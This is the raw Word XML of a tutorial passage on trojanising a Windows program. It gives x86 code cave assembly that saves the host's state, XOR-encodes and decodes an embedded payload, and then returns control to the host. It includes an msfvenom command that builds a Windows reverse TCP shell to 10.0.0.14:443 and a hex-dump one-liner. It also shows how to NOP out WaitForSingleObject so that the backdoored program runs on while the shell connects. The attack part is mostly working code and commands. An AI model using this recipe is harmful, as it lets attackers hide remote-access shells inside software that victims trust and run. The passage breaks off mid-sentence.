    <w:p w14:paraId="2C34648C" w14:textId="15887C22" w:rsidR="00B9697B" w:rsidRPr="00CE241A" w:rsidRDefault="00CE7C8C" w:rsidP="00B9697B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00B9697B" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ushad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  <w:t>;save host process state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D713CBF" w14:textId="793C7F94" w:rsidR="00B9697B" w:rsidRPr="00CE241A" w:rsidRDefault="00B9697B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>pushfd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443B56F9" w14:textId="78D30697" w:rsidR="00B9697B" w:rsidRPr="00CE241A" w:rsidRDefault="00B9697B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>call next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338462E7" w14:textId="20F74462" w:rsidR="00B9697B" w:rsidRPr="00CE241A" w:rsidRDefault="00B9697B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>next:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD3A17F" w14:textId="52DD5845" w:rsidR="00064500" w:rsidRPr="00CE241A" w:rsidRDefault="00B9697B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  pop ebx</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>;grab address after call next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAA74D6" w14:textId="682FA911" w:rsidR="005B59EB" w:rsidRPr="00CE241A" w:rsidRDefault="005B59EB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  add ebx</w:t>
      </w:r>
      <w:r w:rsidR="00823F3C" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>, 0x1a</w:t>
      </w:r>
      <w:r w:rsidR="00565D8C" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00565D8C" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>;adjust ebx to point to start of reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E99D820" w14:textId="0775D8CE" w:rsidR="00E40949" w:rsidRPr="00CE241A" w:rsidRDefault="00E40949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  mov eax, ebx</w:t>
      </w:r>
      <w:r w:rsidR="00565D8C" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00565D8C" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00565D8C" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>;copy to eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627F0D3F" w14:textId="34CCAB16" w:rsidR="00E866A7" w:rsidRPr="00CE241A" w:rsidRDefault="00E866A7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  add ebx, 0x200</w:t>
      </w:r>
      <w:r w:rsidR="00946D62">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00946D62">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>;adjust ebx to point</w:t>
      </w:r>
      <w:r w:rsidR="00565D8C" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> beyond the rest of the code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D019ED2" w14:textId="77777777" w:rsidR="00B9697B" w:rsidRPr="00CE241A" w:rsidRDefault="00B9697B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lastRenderedPageBreak/>
        <w:t>decode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02472234" w14:textId="592B32DA" w:rsidR="005B59EB" w:rsidRPr="00CE241A" w:rsidRDefault="005B59EB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  inc eax</w:t>
      </w:r>
      <w:r w:rsidR="00F50A28">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F50A28">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F50A28">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>;adjust eax to nect byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D98B941" w14:textId="7209F3DA" w:rsidR="00E40848" w:rsidRPr="00CE241A" w:rsidRDefault="00042AEE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  xor </w:t>
      </w:r>
      <w:r w:rsidR="00E40848" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>byte [eax], 0x6d</w:t>
      </w:r>
      <w:r w:rsidR="00F50A28">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F50A28">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>;obfuscate byte with xor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3411CAF5" w14:textId="09A4E0EE" w:rsidR="00E40848" w:rsidRPr="00CE241A" w:rsidRDefault="00E40848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  xor byte [eax], 0xf0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EAD2C6" w14:textId="76C805D3" w:rsidR="00E40848" w:rsidRPr="00CE241A" w:rsidRDefault="00042AEE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  xor</w:t>
      </w:r>
      <w:r w:rsidR="00E40848" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> byte [eax], 0xd6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107AD908" w14:textId="02DCE36B" w:rsidR="00E40848" w:rsidRPr="00CE241A" w:rsidRDefault="00E40848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  cmp eax, ebx</w:t>
      </w:r>
      <w:r w:rsidR="00F50A28">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F50A28">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F50A28">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>;has eax reached ebx?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3689CD65" w14:textId="655E52B3" w:rsidR="001258AC" w:rsidRPr="00CE241A" w:rsidRDefault="005B59EB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  j</w:t>
      </w:r>
      <w:r w:rsidR="00E40848" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>l decode</w:t>
      </w:r>
      <w:r w:rsidR="00641AE6" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00641AE6" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00641AE6" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00641AE6" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00884E0C" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00F50A28">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>continue if not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0FDC90" w14:textId="77777777" w:rsidR="005B59EB" w:rsidRPr="00CE241A" w:rsidRDefault="005B59EB" w:rsidP="001258AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="400C00FA" w14:textId="26497EB3" w:rsidR="005B59EB" w:rsidRPr="00CE241A" w:rsidRDefault="004850B7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>At this point, grab the reverse shellcode and paste it after the assembly code.  Use the following command to help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E0E1F6" w14:textId="77777777" w:rsidR="004850B7" w:rsidRPr="00CE241A" w:rsidRDefault="004850B7" w:rsidP="001258AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29262880" w14:textId="77777777" w:rsidR="004850B7" w:rsidRPr="00CE241A" w:rsidRDefault="004850B7" w:rsidP="004850B7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>msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=10.0.0.14 EXITFUNC=none -f raw &gt; rev-10.0.0.14.443.shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0598D741" w14:textId="77777777" w:rsidR="004850B7" w:rsidRPr="00CE241A" w:rsidRDefault="004850B7" w:rsidP="004850B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37EC76DD" w14:textId="77777777" w:rsidR="004850B7" w:rsidRPr="00CE241A" w:rsidRDefault="004850B7" w:rsidP="004850B7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cat rev-10.0.0.14.443.shell | ruby -ne '$_.each_byte{|b|print"%02x "%b}'
</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F45CE5B" w14:textId="77777777" w:rsidR="00CD5E26" w:rsidRPr="00CE241A" w:rsidRDefault="00CD5E26" w:rsidP="001258AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77BDBF5B" w14:textId="247FEB1E" w:rsidR="004B67AD" w:rsidRPr="00CE241A" w:rsidRDefault="00CE241A" w:rsidP="00CE241A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted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</w:t>
      </w:r>
      <w:r w:rsidR="004B67AD" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>t address 0x0135EC</w:t>
      </w:r>
      <w:r w:rsidR="00B34757">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>34 and 0x0135EC36 change those</w:t>
      </w:r>
      <w:r w:rsidR="004B67AD" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> instructions to NOP.  By patching these 2 instructions, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dwMilliseconds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> argument</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="004B67AD" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>waitForSingleObjectEx API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be set to 0 and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow the </w:t>
      </w:r>
      <w:r w:rsidR="00214DA6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">host program to continue execution </w:t>
      </w:r>
      <w:r w:rsidR="00CA7223">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">normally </w:t>
      </w:r>
      <w:r w:rsidR="00214DA6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">without waiting for the </w:t>
      </w:r>
      <w:r w:rsidR="00CB6989">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">socket to be establish or the </w:t>
      </w:r>
      <w:r w:rsidR="00214DA6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reverse shell session to exit.</w:t>
      </w:r>
      <w:r w:rsidR="004B67AD" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A989D3" w14:textId="70D20165" w:rsidR="004B67AD" w:rsidRPr="00CE241A" w:rsidRDefault="004B67AD" w:rsidP="001258AC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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62165F30" w14:textId="695EC730" w:rsidR="006000D9" w:rsidRDefault="006000D9" w:rsidP="001258AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006000D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">0141EC44      4E            DEC ESI
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; NOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5627AF45" w14:textId="77777777" w:rsidR="006000D9" w:rsidRDefault="006000D9" w:rsidP="001258AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006000D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">0141EC45      56            PUSH ESI
</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0237CF96" w14:textId="77777777" w:rsidR="009D6307" w:rsidRDefault="006000D9" w:rsidP="009D6307">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006000D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">0141EC46      46            INC ESI
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>-&gt; NOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D32134" w14:textId="77777777" w:rsidR="009D6307" w:rsidRDefault="009D6307" w:rsidP="009D6307">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01718515" w14:textId="77777777" w:rsidR="0003426F" w:rsidRDefault="0003426F" w:rsidP="001258AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11F42976" w14:textId="63BAA719" w:rsidR="006F7445" w:rsidRDefault="006F7445" w:rsidP="001258AC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07D2A3BD" wp14:editId="0CC459EE">
            <wp:extent cx="5486400" cy="4104640"/>
            <wp:effectExtent l="0" t="0" r="0" b="10160"/>
            <wp:docPr id="4" name="Picture 3" descr="MyShit:Users:mee:Desktop:img:4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hit:Users:mee:Desktop:img:4.tif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46D1" w14:textId="77777777" w:rsidR="006F7445" w:rsidRDefault="006F7445" w:rsidP="001258AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34490DBE" w14:textId="77777777" w:rsidR="004737A2" w:rsidRPr="009D6307" w:rsidRDefault="004737A2" w:rsidP="004737A2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 xml:space="preserve">Return execution back to host process    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A0F814" w14:textId="77777777" w:rsidR="004737A2" w:rsidRDefault="004737A2" w:rsidP="004737A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="475A1119" w14:textId="77777777" w:rsidR="004737A2" w:rsidRPr="00CE241A" w:rsidRDefault="004737A2" w:rsidP="004737A2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>At the end of the reverse shell, assemble the ret of the code below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654ED368" w14:textId="77777777" w:rsidR="004737A2" w:rsidRPr="00CE241A" w:rsidRDefault="004737A2" w:rsidP="004737A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C112921" w14:textId="112A8F75" w:rsidR="004737A2" w:rsidRPr="00CE241A" w:rsidRDefault="007F1FF1" w:rsidP="004737A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="004737A2" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>opfd</w:t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="000E6CCC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>;return state to host process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5963A37D" w14:textId="77777777" w:rsidR="004737A2" w:rsidRPr="00CE241A" w:rsidRDefault="004737A2" w:rsidP="004737A2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>popad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E83DDB5" w14:textId="28CE3A5F" w:rsidR="004737A2" w:rsidRDefault="004737A2" w:rsidP="004737A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t>CALL 0x</w:t>
      </w:r>
      <w:r w:rsidRPr="005E4E00">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t>0140FF0F</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F1FF1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000E6CCC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007F1FF1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>;run instruction that was over written when hijack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DD46CB" w14:textId="0AA21134" w:rsidR="004737A2" w:rsidRPr="00CE241A" w:rsidRDefault="004737A2" w:rsidP="004737A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Jmp 0x</w:t>
      </w:r>
      <w:r w:rsidRPr="005E4E00">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t>0140510D</w:t>
      </w:r>
      <w:r w:rsidR="007F1FF1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000E6CCC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="007F1FF1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t>;jump back to continue execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580E3661" w14:textId="77777777" w:rsidR="004737A2" w:rsidRDefault="004737A2" w:rsidP="001258AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BD16706" w14:textId="457C405B" w:rsidR="0015564E" w:rsidRPr="00CE241A" w:rsidRDefault="0015564E" w:rsidP="001258AC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Step into the instructions and watch how it slowly </w:t>
      </w:r>
      <w:r w:rsidR="006F72E2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>modifies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the code.  Set a breakpoint after</w:t>
      </w:r>
      <w:r w:rsidRPr="0015564E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>jl decode</w:t>
      </w:r>
      <w:r w:rsidR="004D51AF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F72E2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D51AF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>and let the code run</w:t>
      </w:r>
      <w:r w:rsidR="00C37295">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.  Al</w:t>
      </w:r>
      <w:r w:rsidR="00AC1A6F">
        <w:rPr>
